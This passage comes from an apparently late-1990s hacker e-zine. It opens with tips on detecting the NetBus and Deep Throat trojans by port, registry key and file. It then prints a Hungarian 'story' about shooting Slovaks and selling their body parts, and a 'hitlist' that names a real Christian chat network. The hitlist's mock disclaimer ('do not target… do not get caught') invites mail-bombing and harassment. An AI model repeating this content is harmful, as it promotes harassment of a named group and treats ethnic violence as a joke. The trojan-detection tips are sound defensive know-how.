Ctrl-Alt-Delete and see a program called Sysedit.exe / patch.exe then kill it quick stylee (unless you are actually running sysedit on purpose :P) Sysedit.exe SHOULD be in the folder c:\windows\system, but NOT in c:\windows. Also, if you find any files called sysedit.exe which are larger than 19kb, you've got Netbus Version 1. However, Netbus 2 is more of a fucker, coz its optimised to shit :) Both versions use ports 12345 and 12346. Netbus 2 Signs - be afraid 'lil boy :) WINDOWS NT ======= == FILES AND DIRECTORIES ADDED (2) \Program Files\NetBus\Log.txt \Program Files\NetBus\NBHelp.dll FILES CHANGED (9) \%systemroot%\Profiles\Administrator\ntuser.dat.LOG \%systemroot%\Profiles\Administrator\NTUSER.DAT \%systemroot%\Profiles\Administrator\Recent \%systemroot%\system32\config\SECURITY.LOG \%systemroot%\system32\config\security \%systemroot%\system32\config\software.LOG \%systemroot%\system32\config\software \Program Files\NetBus \INctrl NO CHANGES MADE TO \%systemroot%\SYSTEM.INI... NO CHANGES MADE TO \%systemroot%\WIN.INI... REGISTRY KEYS ADDED (2) HKEY_USERS\User_Sid#\NetBus Server\General HKEY_USERS\User_Sid#\NetBus Server\Protection REGISTRY KEY VALUES ADDED (6) HKEY_USERS\User_Sid#\NetBus Server\General\Accept="0" HKEY_USERS\User_Sid#\NetBus Server\General\AccessMode="2" HKEY_USERS\User_Sid#\NetBus Server\General\AutoStart="0" HKEY_USERS\User_Sid#\NetBus Server\General\TCPPort="20034" HKEY_USERS\User_Sid#\NetBus Server\General\Visibility="0" HKEY_USERS\User_Sid#\NetBus Server\Protection\Password="A" WINDOWS 95 ======= == Run MS-DOS Prompt and type in netstat -an | find "12345". Alternatively, run telnet.exe and try connecting to localhost on port 12345. If you see a prompt saying "Netbus Ver X.XX" then its there. Its less harmful than BO, because it has limited options, but you should still watch ot for it. If your machine plays up, then its worth checking for these two. Deep Throat ==== ====== Yeah, yeah, its got a funny name. "Ho ho ho". It's also fucking annoying. It's hard to detect it, but you should try searching your registy if you are suspicious. Not much is known about it, because its written by some 15yr old bastard who knows his doze ;) It hides itself purely within the registry, doesn't appear in the Ctrl-Alt-Delete list, and has no other signs that it's running. Currently tho, it doesnt do anything too harmful apart from the "Hard drive as ftp server" thing. But, its still in heavy development, which blows. Hope thats some help for you ppl who are *thinking* about moving to linux, because this is just the beginning of my peek into the many problems of Windows, so change, or you'll regret it :) <> ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± >> egy kutya a kunyvtarba << ± ± >> by Jιzus [hungarian@wait.a.fuckin.minute.net] << ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± haha, we'll be starting to run a full course in hungarian soon, or something. Uh yeah. Here's your (maybe?) monthly ration of hungarian ramble. Zoltan a dolgozot a kunyvtarban egy pentek este. Sok szlovak be szalat es ki nesztek egy par kunyvet, es amikor nem nezet zoltan. Ki nyitak a kunyveket es be szartak ara a oldalra amire ki volt nyitva. Zoltan meg lata es ki vet, az asztal alat egy automata pisztojt. Meg huszta a ravaszt amikar a szlovakok hatal voltak es bele talat a hatukban. Le estek a foldre, ver met mindenhova. Eltakarta az egesz sarkot ahol a szlovakok voltak. Zoltan ki vet asot es egy fureszt, el keszded vagni, pont akor amikor be fejeszte egy kutya be szalat. Be vete a szajaba az egyik karot es ki szalt vele. Utana egy rendor be jot. Zoltan meg fagyot. A rendor ra neszet es akor a testreszekre. Meg szolitata "Az ojan husot hogy lehet eni." Zoltan ra neszet meglepodve. A rendor kerdeste hogy "Menyi be kerul". Zoltain mondta hogy ingen volt es a rendor elment. Egy het mulva mind a szolvak test reszeket el adata a lakoknak. [uh I think he got bored and gave up here ... (?)] Ez a mese nem neked van. So fuck you. Jιzus [um well yeah, what can you say? this is about some bookshop or something(?). Who knows. --squi] ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± PLUK Hitlist - February ± ± >> by squi [squi@penis.com] << ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± Ok. Sometimes people just fuck me/us right off. I think it's important for you to understand that the following listings DO NOT serve as suggestions for mail bombing, harrassment, 0wning, or general victimisation. Do not target these fuckwitz losers. Do not use your imagination. Do not get caught. DO NOT BLAME US. Word. February's case study folks: >> http://www.christian-chat.net - irc.christian-chat.net << They have a particularly impressive range of anally retentive fuck-up opers: quit ignoring me [0:31] why, I can don't you consider ignorance rude? I sure as hell do. [0:33] well actually if you had read the room rules you would have found out that this is an online church, not just a chatroom, also you would know that we do not tolerate certain language, and more than that, we don't have to my religion is radiohead. [0:33] this is my chatroom can I ask a question? [0:33] hehehehe you poor dear, must be a teenager right? sorry pal I'm 23 ;p you're gonna burn in hell for that +b. [0:33] i doubt it : ) [0:34] and where will you spend eternity? in my lesbian sex parlour but that's besides the point i don't I KNOW you'll suffer for that +b [0:34] hehehehehe doubt that too why do you feel the need to hang out 24/7 on a purely christian network, and actively abuse non-christian users? does that not strike you as kinda intolerant and ignorant ? [0:42] I like to spend time with people who are going to be spending eternity with me.....get to know them. They spell their server messages incorrectly: *** [Swearing not allowed complaints@chrisitan-chat.net] They generally suck: >> Join to #christiansonline was synced in 1.020 secs!! [0:25] welcome in the name of the Lord >> Updated IAL for #christiansonline [0:25] ... welcome to our online church.. type /chatbot rule #christiansonline list to see the rules... visit our webpage at www.lsds.com/conline/ .... Jesus is Lord!! 'Nuff said I think. Christian-chat.net needs pheer therapy. Bigtime. --squi =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-EOF-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= whew. pluk02 done and dusted. Time to get working [yea, right] on pluk03. We are always grateful for articles [hint, hint] so write for us, goddammit. By now you should have a vague idea what we're about, and what kind of lame-ass articles we print. uh, yea. THANKYOU FOR YOUR TIME =) -mrsp00n Um yeah. That was our second issue. I have a bad tendency to state the obvious when I have nothing interesting to say, so I guess I'll just shut the fuck up. Thanks to all our contributors. Yeah - give us some more feedback, we kinda appreciate knowing what you think. Word. --squi to the group or the zine. I'm worthless. I'll try to make an effort in 03 to make my momma proud. Tune in next month; same pluk zine, same nacho cheese doritos. Peace, tranquility, and Radiohead homies. We out. --division =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-EOF-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=